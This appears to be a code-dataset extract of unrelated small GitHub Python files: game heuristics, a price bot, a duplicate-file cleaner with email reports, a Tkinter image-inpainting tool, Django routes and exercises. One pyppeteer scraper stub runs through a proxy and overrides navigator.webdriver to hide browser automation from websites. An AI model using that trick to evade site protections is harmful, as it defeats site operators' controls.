0, 0, 0, 0, 0, 0, 4],\r\n#\t\t[4, 0, 0, 0, 0, 0, 0, 4],\r\n#\t\t[4, 0, 0, 0, 0, 0, 0, 4],\r\n#\t\t[4, 4, 4, 4, 4, 4, 4, 4],\r\n#\t]\r\n#)\r\n\r\ndef HEUR_edges(data: StatisticData) -> float:\r\n\t\"\"\"\r\n\tHeuristic function that takes into account the difference of captures\r\n\ton edges.\r\n\t\r\n\tReturns evaluation, in most cases in range -100 - 100.\r\n\t\"\"\"\r\n\r\n\tedges = np.sum(data.mat * EDGE_MATRIX)\r\n\r\n\treturn edges\r\n\r\ndef HEUR_mobility(data: StatisticData) -> float:\r\n\t\"\"\"\r\n\tHeuristic function that takes into account the difference of mobility\r\n\tof players.\r\n\t\r\n\tReturns evaluation range -scale - scale.\r\n\t\"\"\"\r\n\r\n\ttotal = data.my_move_count + data.opponent_move_count\r\n\tdiff = data.my_move_count - data.opponent_move_count\r\n\r\n\tif total == 0:\r\n\t\treturn 0\r\n\r\n\treturn data.scale * diff / total\r\n\r\nCORNER_CLOSENESS_MATRIX = None\r\n\r\nCORNER_CLOSENESS_MATRICES = {\r\n\t8:\r\n\tnp.array([\r\n\t\t[27, -9, 0, 0, 0, 0, -9, 27],\r\n\t\t[-9, -9, 0, 0, 0, 0, -9, -9],\r\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\r\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\r\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\r\n\t\t[0, 0, 0, 0, 0, 0, 0, 0],\r\n\t\t[-9, -9, 0, 0, 0, 0, -9, -9],\r\n\t\t[27, -9, 0, 0, 0, 0, -9, 27],\r\n\t]),\r\n\r\n\t10:\r\n\tnp.array([\r\n\t\t[27, -9, 0, 0, 0, 0, 0, 0, -9, 27],\r\n\t\t[-9, -9, 0, 0, 0, 0, 0, 0, -9, -9],\r\n\t\t[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\r\n\t\t[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\r\n\t\t[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\r\n\t\t[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\r\n\t\t[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\r\n\t\t[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\r\n\t\t[-9, -9, 0, 0, 0, 0, 0, 0, -9, -9],\r\n\t\t[27, -9, 0, 0, 0, 0, 0, 0, -9, 27],\r\n\t]),\r\n\r\n\t6:\r\n\tnp.array([\r\n\t\t[27, -9, 0, 0, -9, 27],\r\n\t\t[-9, -9, 0, 0, -9, -9],\r\n\t\t[0, 0, 0, 0, 0, 0],\r\n\t\t[0, 0, 0, 0, 0, 0],\r\n\t\t[-9, -9, 0, 0, -9, -9],\r\n\t\t[27, -9, 0, 0, -9, 27],\r\n\t]),\r\n}\r\n\r\ndef HEUR_corner_closeness(data: StatisticData) -> float:\r\n\t\"\"\"\r\n\tHeuristic function that takes into account the difference of captured\r\n\tfields adjacent to corners.\r\n\t\r\n\tReturns evaluation, in most cases in range -100 - 100.\r\n\t\"\"\"\r\n\r\n\tcorner_closeness = np.sum(data.mat * CORNER_CLOSENESS_MATRIX)\r\n\r\n\treturn corner_closeness\r\n\r\ndef HEUR_frontier(data: StatisticData) -> float:\r\n\t\"\"\"\r\n\tHeuristic function that takes into account the difference of disks\r\n\tadjacent to empty space(s).\r\n\t\r\n\tReturns evaluation, in most cases in range 
-100 - 100.\r\n\t\"\"\"\r\n\r\n\tmask = np.zeros(data.mat.shape)\r\n\r\n\tvalue = 100 / ((data.mat.shape[0] - 1) * (data.mat.shape[1] - 1))\r\n\thalf_value = value / 2\r\n\r\n\t# handle inner cells\r\n\tfor y in range(1, data.mat.shape[1]):\r\n\t\tfor x in range(1, data.mat.shape[0]):\r\n\t\t\tif data.mat[y,x] != 0:\r\n\t\t\t\t# if there are no empty squares, product is non-zero, 0 is written\r\n\t\t\t\t# if there are empty squares, product is zero, -x is written\r\n\t\t\t\tmask[y,x] = -value * int(not np.prod(data.mat[y-1:y+2, x-1:x+2]))\r\n\r\n\t# handle y edges\r\n\tfor y in range(1, data.mat.shape[1]):\r\n\t\tif data.mat[y,0] != 0:\r\n\t\t\tmask[y,0] = -half_value * int(not np.prod(data.mat[y-1:y+2, 0:2]))\r\n\r\n\t\tif data.mat[y,-1] != 0:\r\n\t\t\tmask[y,-1] = -half_value * int(not np.prod(data.mat[y-1:y+2, -2:]))\r\n\r\n\t# handle x edges\r\n\tfor x in range(1, data.mat.shape[1]):\r\n\t\tif data.mat[0,x] != 0:\r\n\t\t\tmask[0,x] = -half_value * int(not np.prod(data.mat[0:2, x-1:x+2]))\r\n\r\n\t\tif data.mat[-1,x] != 0:\r\n\t\t\tmask[-1,x] = -half_value * int(not np.prod(data.mat[-2:, x-1:x+2]))\r\n\r\n\t# ignore corners\r\n\r\n\tfrontier = np.sum(data.mat * mask)\r\n\r\n\treturn frontier\r\n\r\nPOSITIONAL_MATRIX = None\r\n\r\nPOSITIONAL_MATRICES = {\r\n\t8:\r\n\r\n# inspired by https://www.samsoft.org.uk/reversi/strategy.htm#stable\r\nnp.array(\r\n\t[\r\n\t\t[99,-8,8,6,6,8,-8,99],\r\n\t\t[-8,-24,-4,-3,-3,-4,-24,-8],\r\n\t\t[8,-4,7,4,4,7,-4,8],\r\n\t\t[6,-3,4,0,0,4,-3,6],\r\n\t\t[6,-3,4,0,0,4,-3,6],\r\n\t\t[8,-4,7,4,4,7,-4,8],\r\n\t\t[-8,-24,-4,-3,-3,-4,-24,-8],\r\n\t\t[99,-8,8,6,6,8,-8,99],\r\n\t]\r\n),\r\n\r\n10:\r\nnp.array(\r\n\t[\r\n\t\t[99,-8,8,6,6,6,6,8,-8,99],\r\n\t\t[-8,-24,-4,-3,-3,-3,-3,-4,-24,-8],\r\n\t\t[8,-4,7,4,4,4,4,7,-4,8],\r\n\t\t[6,-3,4,0,0,0,0,4,-3,6],\r\n\t\t[6,-3,4,0,0,0,0,4,-3,6],\r\n\t\t[6,-3,4,0,0,0,0,4,-3,6],\r\n\t\t[6,-3,4,0,0,0,0,4,-3,6],\r\n\t\t[8,-4,7,4,4,4,4,7,-4,8],\r\n\t\t[-8,-24,-4,-3,-3,-3,-3,-4,-24,-8],\r\n\t\t[99,-8,8,6,6,6,6,8,-8,99],\r\n\t]\r\n),\r\n\r\n6:\r\nnp.array(\r\n\t[\r\n\t\t[99,-8,8,8,-8,99],\r\n\t\t[-8,-24,-4,-4,-24,-8],\r\n\t\t[8,-4,0,0,-4,8],\r\n\t\t[8,-4,0,0,-4,8],\r\n\t\t[-8,-24,-4,-4,-24,-8],\r\n\t\t[99,-8,8,8,-8,99],\r\n\t]\r\n),\r\n}\r\n\r\ndef HEUR_positional(data: StatisticData) -> float:\r\n\tpositional_score = np.sum(data.mat * POSITIONAL_MATRIX)\r\n\r\n\treturn positional_score\t\r\n","repo_name":"ForgotMyCode/ReversiBot","sub_path":"heuristic.py","file_name":"heuristic.py","file_ext":"py","file_size_in_byte":7646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7539484589","text":"import requests\nfrom googlefinance import getQuotes\nfrom helga import settings\nfrom helga.plugins import command, random_ack\n\n\nCRYPTO_URL = 'https://min-api.cryptocompare.com/data/price?fsym={from_symbol}&tsyms={to_symbol}'\nCRYPTO_LIST = 'https://www.cryptocompare.com/api/data/coinlist/'\nTARGET_CURRENCY = getattr(settings, 'TRADE_TARGET_CURRENCY', 'USD')\nRESPONSE_TEMPLATE = '{currency_type} {symbol} is currently trading at {price} {target_currency}'\ncrypto_data = None\n\n\ndef logic(args):\n crypto_data = fetch_crypto_data()\n if len(args) == 1:\n symbol = args[0].lower()\n try:\n price = try_crypto(symbol)\n return RESPONSE_TEMPLATE.format(currency_type='Crypto', symbol=symbol, price=price, target_currency=TARGET_CURRENCY)\n except ValueError:\n try:\n price = float(getQuotes(symbol)[0]['LastTradePrice'])\n return RESPONSE_TEMPLATE.format(currency_type='Stock', 
symbol=symbol, price=price, target_currency=TARGET_CURRENCY)\n except:\n return 'Symbol ' + symbol + ' not supported!'\n return 'Try asking for help? Unknown command: ' + ', '.join(args)\n\n\ndef try_crypto(symbol='btc'):\n \"\"\" Test out of symbol is crypto, and if so return price. Throw ValueError otherwise. \"\"\"\n if symbol not in crypto_data:\n for crypto_symbol, data in crypto_data.items():\n if data['CoinName'] == symbol:\n symbol = crypto_symbol\n if symbol in crypto_data:\n response = requests.get(CRYPTO_URL.format(from_symbol=symbol.upper(), to_symbol=TARGET_CURRENCY)).json()\n price = response[TARGET_CURRENCY]\n return float(price)\n raise ValueError(symbol + ' not available as crypto')\n\n\ndef fetch_crypto_data():\n \"\"\" Fetch and parse crypto data \"\"\"\n global crypto_data\n if not crypto_data:\n response = requests.get(CRYPTO_LIST).json()\n crypto_data = {symbol.lower(): data for symbol, data in response['Data'].items()}\n return crypto_data\n\n\n@command('trade', help='Stock, crypto, forex trade information plugin for helga\\n!trade btc')\ndef trade(client, channel, nick, message, cmd, args):\n return logic(args)\n","repo_name":"narfman0/helga-trade","sub_path":"helga_trade/helga_trade.py","file_name":"helga_trade.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72060606201","text":"import os\nimport time\nimport schedule\nimport EmailModule\nfrom sys import *\nfrom datetime import datetime\nimport Checksum as module\n\nFilesScanCount = 0\nFilesDeleteCount = 0\nOutput = \"\"\nScan_Time = \"\"\nLog_Time = \"\"\n\n\ndef CreateOutput(Dir_Name, Log_Dir=\"Marvellous\"):\n Log_Dir = os.path.join(Dir_Name, Log_Dir)\n if not os.path.exists(Log_Dir):\n os.mkdir(Log_Dir)\n\n global FilesScanCount, FilesDeleteCount, Output, Scan_Time, Log_Time\n Scan_Time = datetime.now().strftime(\"%I:%M:%S %p\")\n\n lst, FileScanCnt, FileDeletedCnt = module.DeleteDuplicateFiles(Dir_Name)\n\n FilesScanCount = FileScanCnt\n FilesDeleteCount = FileDeletedCnt\n\n Log_Time = time.ctime()\n FileName = Log_Dir + \"\\Yogesh_log.txt\"\n\n Output = FileName\n data = \"\"\n fd = open(FileName, \"w\")\n fd.write(\"Log of deleted duplicate files, from directory: \" + Log_Time + \"\\n\")\n fd.write(data)\n for i in lst:\n fd.write(\"\\n\" + \"-\" * 80)\n fd.write(\"\\n\" + str(i))\n fd.close()\n\n\ndef CreateMail(To, FileName, Scan_Time, Log_Time, FileScanCnt, FileDeletedCnt):\n username = \"yogeshnichal@gmail.com\"\n password = \"**** **** **** ****\" # Google, App Passwords for SMTP\n to = To\n\n name = To[0:To.rfind('@')]\n name = ''.join(i for i in name if not i.isdigit())\n\n subject = \"This email sent by program about process log report: %s\" % Log_Time\n\n body = (\"\"\"\\\n <html>\n <body>\n <p>Hello, %s<p>\n <b style=\"font-size: 1rem; color: #483D8B;\"> Python Automation Mail Schedule with Attachment Script.</b>\n <p>Please find attached log file which contains<p>\n <p>Log of deleted duplicate files, from directory.<p>\n <p>Scanning process started at: %s<p>\n <p>Total files scanned: %s<p> \n <p>Total duplicate files found: %s<p>\n\n <p>This is autogenerated mail.<p>\n\n <p>Thanks & Regards,<p>\n <p>Yogesh Prabhu Nichal<p>\n </body>\n </html>\n \"\"\"\n ) % (name, Scan_Time, FileScanCnt, FileDeletedCnt)\n\n if EmailModule.is_connected():\n EmailModule.sendmail(username, password, To, FileName, subject, body)\n\n\ndef main():\n print(\"-------------------------------------Yogesh Prabhu 
Nichal------------------------------------------\")\n print(\"\\nApplication name:\", argv[0])\n\n if len(argv) != 4:\n print(\"Insufficient number of arguments. Use -h or -u for help.\")\n exit()\n\n if argv[1].lower() == \"-h\":\n print(\"This script will traverse the directory and delete all duplicate files from that directory.\\n\"\n \"Script will write name of deleted files into a 'log' file & Log.txt will create into Directory_Name\\n\"\n \"and Mail will send with log file attachment Receiver_Email_id\")\n exit()\n\n if argv[1].lower() == \"-u\":\n print(\"Use: Application_Name Directory_Name Interval_Time Receiver_Email_id\")\n exit()\n\n try:\n Dir_Name = argv[1]\n Time_Interval = int(argv[2])\n To_Email = argv[3]\n\n schedule.every(Time_Interval).minutes.do(lambda: CreateOutput(Dir_Name))\n schedule.every(int(1)).minutes.do(lambda: CreateMail(To_Email, Output, Scan_Time, Log_Time, FilesScanCount, FilesDeleteCount))\n\n while True:\n schedule.run_pending()\n time.sleep(2)\n\n except Exception as E:\n print(E)\n finally:\n print(\"\\n--------------------------------------Thank You--------------------------------------\")\n\n\nif __name__ == \"__main__\":\n main()\n\n # py Assignment13.py D:\\Demo 01 myfriend.nichal@gmail.com","repo_name":"yogeshnichal/Python_Automation_-_Machine_Learning","sub_path":"Assignment13/Assignment13.py","file_name":"Assignment13.py","file_ext":"py","file_size_in_byte":3680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"41858074038","text":"import math\ndef sotien(n):\n a = [10,3,3,1]\n for i in a[:]:\n so_to = n//i\n print(\"Tien\",i,\"d co\" , so_to, \"to\")\n n=n%i \nN = int(input(\"nhap vao so tien: \"))\nsotien(N)\n ","repo_name":"DongPhung1996/Python_01","sub_path":"sotien.py","file_name":"sotien.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"20746811623","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 28 09:43:24 2020\n\n@author: user\n\"\"\"\n\nimport tkinter as tk\nfrom tkinter import ttk\nimport tkinter.font as tkFont\nfrom PIL import ImageTk, Image\nfrom tkinter import filedialog\nfrom test_model import Output\nimport numpy as np\nimport cv2\nimport re\n\nclass Mouse:\n def __init__(self,canvas):\n \n self.x = self.y = 0\n self.canvas = canvas\n\n self.canvas.bind(\"<ButtonPress-1>\", self.on_button_press)\n self.canvas.bind(\"<B1-Motion>\", self.on_move_press)\n self.canvas.bind(\"<ButtonRelease-1>\", self.on_button_release)\n\n self.rect = None\n\n self.start_x = None\n self.start_y = None\n \n self.mask_img = np.zeros((256,256), dtype=\"uint8\")\n\n def on_button_press(self, event):\n # save mouse drag start position\n self.start_x = self.canvas.canvasx(event.x)\n self.start_y = self.canvas.canvasy(event.y)\n\n # create rectangle if not yet exist\n #if not self.rect:\n self.rect = self.canvas.create_rectangle(self.x, self.y, 1, 1, fill='white', outline=\"\")\n\n def on_move_press(self, event):\n curX = self.canvas.canvasx(event.x)\n curY = self.canvas.canvasy(event.y)\n \n # expand rectangle as you drag the mouse\n self.canvas.coords(self.rect, self.start_x, self.start_y, curX, curY) \n\n def on_button_release(self, event):\n self.rectRecord(self.start_x,self.start_y,self.canvas.canvasx(event.x),self.canvas.canvasy(event.y))\n pass\n \n def rectRecord(self,x1,y1,x2,y2):\n print(x1,y1,x2,y2)\n x1,y1,x2,y2 = int(x1),int(y1),int(x2),int(y2)\n for i in 
range(y1,y2+1):\n for j in range(x1,x2+1):\n self.mask_img[i,j] = 255\n\ndef readFile():\n #print(\"readFile\")\n global img\n global mouse\n global pic\n mouse = Mouse(canvas)\n basewidth = 700\n baseheight = 500\n imgsize = 0,0\n try:\n filename = filedialog.askopenfilename(title='open')\n img = Image.open(filename)\n '''\n if img.size[0]>img.size[1]:\n wpercent = (basewidth/float(img.size[0]))\n hsize = int((float(img.size[1])*float(wpercent)))\n imgsize = basewidth, hsize\n img = img.resize((basewidth, hsize), Image.ANTIALIAS)\n\n else:\n wpercent = (baseheight/float(img.size[1]))\n wsize = int((float(img.size[0])*float(wpercent)))\n imgsize = wsize,baseheight\n img = img.resize((wsize, baseheight), Image.ANTIALIAS)\n '''\n print(img.size)\n canvas.config(width=img.size[0],height=img.size[1])\n img = ImageTk.PhotoImage(img)\n canvas.create_image(130,130,anchor='center',image=img)\n #panel.configure(image=img)\n #panel.image = img\n tmp = filename.split(\"/\")\n filename = tmp[len(tmp)-1]\n print(filename)\n tmp = filename.split(\"_\")\n pic = tmp[len(tmp)-1].split(\".\")[0]\n print(pic)\n \n except:\n print('no file is loaded')\n\ndef maskDone():\n print(\"maskDone\")\n cv2.imshow(\"mask_\"+pic+\".png\", mouse.mask_img)\n cv2.imwrite(\"places356_mask/mask_\"+pic+\".png\", mouse.mask_img)\n cv2.waitKey(0)\n\n \ndef saveFile():\n print(\"saveFile\")\n image = \"Places365_test_\" + pic + \".jpg\"\n mask = \"mask_\" + pic + \".png\"\n output = \"output_\" + pic + \".png\"\n Output(image,mask,output)\n #print(\"!python test.py --image \\\"drive/My Drive/generative_inpainting-master/examples/places356/Places365_test_\" + pic + \".jpg\\\" --mask \\\"drive/My Drive/generative_inpainting-master/examples/places356/mask_\" + pic + \".png\\\" --output \\\"drive/My Drive/generative_inpainting-master/examples/places356/output_\" + pic + \".png\\\" --checkpoint \\\"drive/My Drive/generative_inpainting-master/model_logs/release_places2_256\\\"\")\n \n\ndef callback(event):\n print(\"clicked at\", event.x, event.y)\n\nif __name__ == \"__main__\":\n window = tk.Tk()\n # 設定視窗標題、大小和背景顏色\n window.title('Image Inpainting')\n window.geometry('600x400')\n window.configure(background='white')\n \n titleFont = tkFont.Font(family=\"Microsoft JhengHei\", size=20)\n buttonFont = tkFont.Font(family=\"Microsoft JhengHei\", size=15)\n style = ttk.Style() \n style.configure('TButton', font = ('calibri', 20, 'bold'), borderwidth = '4') \n \n \n header_label = tk.Label(window, text='Image Inpainting',background='white',font=titleFont)\n header_label.pack()\n \n # 以下為 button_frame 群組\n button_frame = tk.Frame(window,background='white')\n button_frame.pack(side=tk.TOP)\n \n # 讀取新圖片\n read_file = tk.Button(button_frame, text =\"讀檔\", command = readFile,font=buttonFont,width=10)\n read_file.pack(side=tk.LEFT,padx=30,pady=20)\n \n # 畫框框\n mask_done = tk.Button(button_frame, text =\"完成\", command = maskDone,font=buttonFont,width=10)\n mask_done.pack(side=tk.LEFT,padx=30,pady=20)\n \n # 輸出結果\n save_file = tk.Button(button_frame, text =\"儲存\", command = saveFile,font=buttonFont,width=10)\n save_file.pack(side=tk.LEFT,padx=30,pady=20)\n \n # image視窗\n canvas = tk.Canvas(window, width=256, height=256,bg='black', cursor=\"cross\")\n #canvas.bind(\"<Button-1>\", callback)\n canvas.pack(side = \"bottom\",padx=30,pady=20)\n #panel = tk.Label(window,bg='gray')\n #panel.pack(side = \"bottom\", fill = \"both\", expand = \"yes\",padx=30,pady=30)\n \n # 運行主程式\n 
window.mainloop()","repo_name":"littlehanli/2020CV_Image-Inpainting","sub_path":"Tkinter.py","file_name":"Tkinter.py","file_ext":"py","file_size_in_byte":5460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19929487309","text":"# -*- coding:utf-8 -*-\n# author:LeiLei\n\n# -*- coding:utf-8 -*-\n# author:LeiLei\nimport asyncio\nimport datetime\nimport json\nimport logging\nimport random\nimport time\nimport pyppeteer\nimport requests\nfrom pyppeteer import launch\n\nheaders = {\n 'User-Agent' : 'Mozilla/5.0 (windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/93.0.4573.0 Safari/537.36'\n }\n\n\nclass One(object) :\n\n def __init__(self):\n # 日志的基本配置\n logging.basicConfig(level = logging.INFO, format = '%(asctime)s - %(levelname)s: %(message)s')\n self.all_id = set()\n self.all_page = set()\n self.done_page = set()\n self.not_done_page = set()\n self.limit = 20\n self.conunt = []\n self.proxys = set()\n\n\n async def scrap_id_all(self):\n browser = await launch(\n headless = False, dumpio = True, autoClose = False,\n args = ['--no-sandbox', '--disable-infobars',f'--proxy-server=89.218.11.2:8080']\n ) # 进入有头模式\n page = await browser.newPage() # 打开新的标签页\n # await page.setViewport({'width' : 1920, 'height' : 1080}) # 页面大小一致 js为设置webdriver的值,防止网站检测 在 pyppeteer\n # 中提供了一个方法:evaluateOnNewDocument(),该方法是将一段 js 代码加载到页面文档中,当发生页面导航、页面内嵌框架导航的时候加载的 js 代码会自动执行,那么当页面刷新的时候该 js\n # 也会执行,这样就保证了修改网站的属性持久化的目的。\n\n await page.evaluateOnNewDocument(\n '() =>{ Object.defineProperties(navigator,'\n '{ webdriver:{ get: () => false } }) }'\n )\n\n\n\nif __name__ == '__main__' :\n print(requests.get('https://www.qiushibaike.com/').text)","repo_name":"124847/python_Project","sub_path":"Spark_Do/last/one.py","file_name":"one.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12533913283","text":"import numpy as np \r\nimport matplotlib.pyplot as plt \r\nimport os\r\nimport handfulFunctions as hf\r\n\r\nclass mdrOutput:\r\n\r\n def __init__(self, nof=''):\r\n\r\n self.nameOfFile = nof\r\n\r\n fileLen = int(hf.fileLength(self.nameOfFile))\r\n self.arrayDischNum = np.zeros(fileLen, dtype=int)\r\n self.arrayDiagFreq = np.zeros(fileLen)\r\n self.arrayFreqShift = np.zeros(fileLen)\r\n self.arrayKapaSpec = np.zeros(fileLen)\r\n self.arrayRho = np.zeros(fileLen)\r\n self.arrayUncerRho = np.zeros(fileLen)\r\n self.arrayKapaPerp = np.zeros(fileLen)\r\n self.arrayUnKapaPe = np.zeros(fileLen)\r\n self.arrayMagField = np.zeros(fileLen)\r\n\r\n idx = 0\r\n\r\n with open(nof, 'r') as myFile:\r\n for line in myFile:\r\n fields = line.split()\r\n correctFields = [i for i in fields]\r\n self.arrayDischNum[idx] = int(correctFields[0])\r\n self.arrayDiagFreq[idx] = float(correctFields[1])\r\n self.arrayFreqShift[idx] = float(correctFields[4]) \r\n self.arrayKapaSpec[idx] = float(correctFields[5])\r\n self.arrayRho[idx] = float(correctFields[10])\r\n self.arrayUncerRho[idx] = float(correctFields[11])\r\n self.arrayKapaPerp[idx] = float(correctFields[12])\r\n self.arrayUnKapaPe[idx] = float(correctFields[13])\r\n self.arrayMagField[idx] = float(correctFields[14])\r\n idx = idx + 1\r\n myFile.closed\r\n\r\n self.arrayVelocityPerp = 2. 
* np.pi * self.arrayFreqShift / self.arrayKapaPerp\r\n self.arrayElectricField = self.arrayVelocityPerp * self.arrayMagField\r\n\r\n def dischInFile(self):\r\n return np.unique(self.arrayDischNum)\r\n\r\n def giveDiagFreq(self, whichDisch=0):\r\n idx = np.where(self.arrayDischNum==whichDisch)\r\n return self.arrayDiagFreq[idx] if whichDisch!=0 else self.arrayDiagFreq\r\n\r\n def giveFreqShift(self, whichDisch=0):\r\n idx = np.where(self.arrayDischNum==whichDisch)\r\n return self.arrayFreqShift[idx] if whichDisch!=0 else self.arrayFreqShift\r\n \r\n def giveMaxKapaSpectrum(self, whichDisch=0):\r\n idx = np.where(self.arrayDischNum==whichDisch)\r\n return self.arrayKapaSpec[idx] if whichDisch!=0 else self.arrayKapaSpec\r\n\r\n def giveRho(self, whichDisch=0):\r\n idx = np.where(self.arrayDischNum==whichDisch)\r\n return self.arrayRho[idx] if whichDisch!=0 else self.arrayRho\r\n\r\n def giveUncerRho(self, whichDisch=0):\r\n idx = np.where(self.arrayDischNum==whichDisch)\r\n return self.arrayUncerRho[idx] if whichDisch!=0 else self.arrayUncerRho\r\n\r\n def giveKapaPerp(self, whichDisch=0):\r\n idx = np.where(self.arrayDischNum==whichDisch)\r\n return self.arrayKapaPerp[idx] if whichDisch!=0 else self.arrayKapaPerp\r\n\r\n def giveUnKapaPe(self, whichDisch=0):\r\n idx = np.where(self.arrayDischNum==whichDisch)\r\n return self.arrayUnKapaPe[idx] if whichDisch!=0 else self.arrayUnKapaPe\r\n\r\n def giveMagField(self, whichDisch=0):\r\n idx = np.where(self.arrayDischNum==whichDisch)\r\n return self.arrayMagField[idx] if whichDisch!=0 else self.arrayMagField\r\n\r\n def giveVelocityPerp(self, whichDisch=0):\r\n idx = np.where(self.arrayDischNum==whichDisch)\r\n return self.arrayVelocityPerp[idx] if whichDisch!=0 else self.arrayVelocityPerp\r\n\r\n def giveElectricField(self, whichDisch=0):\r\n idx = np.where(self.arrayDischNum==whichDisch)\r\n return self.arrayElectricField[idx] if whichDisch!=0 else self.arrayElectricField","repo_name":"ManolisMaragkoudakis/pycess_Data_MDR","sub_path":"readMdrData.py","file_name":"readMdrData.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30050069022","text":"# Jack 'O Lantern problem\n\ndef sep_and_multiply(int_string):\n \"\"\"A function to return a list of integers from a whitespace-separated string\"\"\"\n return [int(i) for i in int_string.split(\" \")]\n\ndef multiply_list(int_list):\n \"A function to multiply a list of integers\"\n t = 0\n multiple = 0\n for i in int_list:\n if t == 0:\n multiple = i\n t += 1\n else:\n multiple *= i\n t+=1\n return multiple\n\ndef main(int_string):\n \"Separates a list of integers and multiplies\"\n return multiply_list(sep_and_multiply(int_string))\n\nimport sys\ninput = sys.stdin.read()\nprint(main(input))","repo_name":"susieir/kattis","sub_path":"jackolantern.py","file_name":"jackolantern.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4780658166","text":"import sys\ninput = sys.stdin.readline\n\nn = int(input()) # 컴퓨터의 수\nk = int(input()) # 직접 연결된 컴퓨터 쌍의 수\n\ngraph = [[] for _ in range(n+1)]\nvisited = [False for _ in range(n+1)] # 방문 여부\n\nfor _ in range(k):\n x, y = map(int,input().split())\n graph[x].append(y)\n graph[y].append(x)\n\ndef dfs(v):\n visited[v] = True # 방문 처리\n for node in graph[v]:\n if not visited[node]:\n 
dfs(node)\n\ndfs(1)\nprint(visited.count(True)-1)","repo_name":"jeilbitna/project","sub_path":"baekjoon/baekjoon2606.py","file_name":"baekjoon2606.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73913791159","text":"from django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('account/', include('django.contrib.auth.urls'), name=\"login\"),\n path('signup/', views.SignUp.as_view(), name='signup'),\n path('logout/', views.logout_view, name='logout'),\n\n path('ingredient/', views.IngredientList.as_view(), name=\"ingredientlist\"),\n path('menu/', views.MenuItemList.as_view(), name=\"menu\"),\n path('recipe/', views.RecipeRequirementList.as_view(), name=\"recipe\"),\n path('purchase/', views.PurchaseList.as_view(), name=\"purchase\"),\n path('inventory/', views.IngredientList.as_view(), name=\"inventory\"),\n\n\n path('ingredient/create', views.IngredientCreate.as_view(), name=\"ingredientcreate\"),\n path('menuitem/create', views.MenuItemCreate.as_view(), name=\"menuitemcreate\"),\n path('recipe/create', views.RecipeRequirementCreate.as_view(), name=\"recipecreate\"),\n path('purchase/create', views.PurchaseCreate.as_view(), name=\"purchasecreate\"),\n\n path('ingredient/update/<pk>', views.IngredientUpdate.as_view(), name=\"ingredientupdate\"),\n path('menuitem/update/<pk>', views.MenuItemUpdate.as_view(), name=\"menuitemupdate\"),\n path('recipe/update/<pk>', views.RecipeRequirementUpdate.as_view(), name=\"recipeupdate\"),\n path('purchase/update/<pk>', views.PurchaseUpdate.as_view(), name=\"purchaseupdate\"),\n\n path('ingredient/delete/<pk>', views.IngredientDelete.as_view(), name=\"ingredientdelete\"),\n path('menuitem/delete/<pk>', views.MenuItemDelete.as_view(), name=\"menuitemdelete\"),\n path('recipe/delete/<pk>', views.RecipeRequirementDelete.as_view(), name=\"recipedelete\"),\n path('purchase/delete/<pk>', views.PurchaseDelete.as_view(), name=\"purchasedelete\"),\n]","repo_name":"Crypto-Advisor/djangodelights","sub_path":"inventory/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3620668224","text":"\"\"\"\\nWriters have a relatively limited vocabulary from which to choose words to open\nor close a sentence. We hypothesize that the choices are subject to interference.\nThe value of this feature is the normalized frequency of tokens appearing in\nthe first, second, antepenultimate, penultimate and last positions in a\nsentence. We exclude sentences shorter than five tokens. 
Punctuation marks are\nconsidered as tokens in this feature, and for this reason the three last\npositions of a sentence are considered, while only the first two of them are\ninteresting for our purposes.\n\"\"\"\n\nimport translationese\nfrom translationese.utils import sparse_dict_increment\n\nPOSITION_NAMES = {\n \"first\": 0,\n \"second\": 1,\n \"antepenultimate\":-4,\n \"penultimate\":-3,\n \"last\":-2 # -1 is the period\n }\n\"\"\"Names of the various positions of the sentence, final period excluded.\"\"\"\n\ndef quantify(analysis):\n \"\"\"Analyze positional token frequency.\"\"\"\n assert isinstance(analysis, translationese.Analysis)\n\n result = {}\n\n for sentence in analysis.tokenized_sentences():\n if len(sentence) < 6:\n # Sentence has fewer than 5 tokens (and a period)\n continue\n for position_name, position in POSITION_NAMES.items():\n key = \"%s %s\" % (position_name, sentence[position])\n sparse_dict_increment(result, key)\n\n return result\n","repo_name":"lutzky/translationese","sub_path":"translationese/positional_token_frequency.py","file_name":"positional_token_frequency.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"39501851926","text":"from rest_framework import serializers\nfrom .models import Menu, MenuItem, DietOptions, MenuSections\n\nclass MenuItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = MenuItem\n fields = [\n 'id',\n 'name',\n 'description',\n 'price',\n 'section',\n 'diet',\n 'portion',\n 'created_at',\n 'updated_at'\n ]\n\nclass 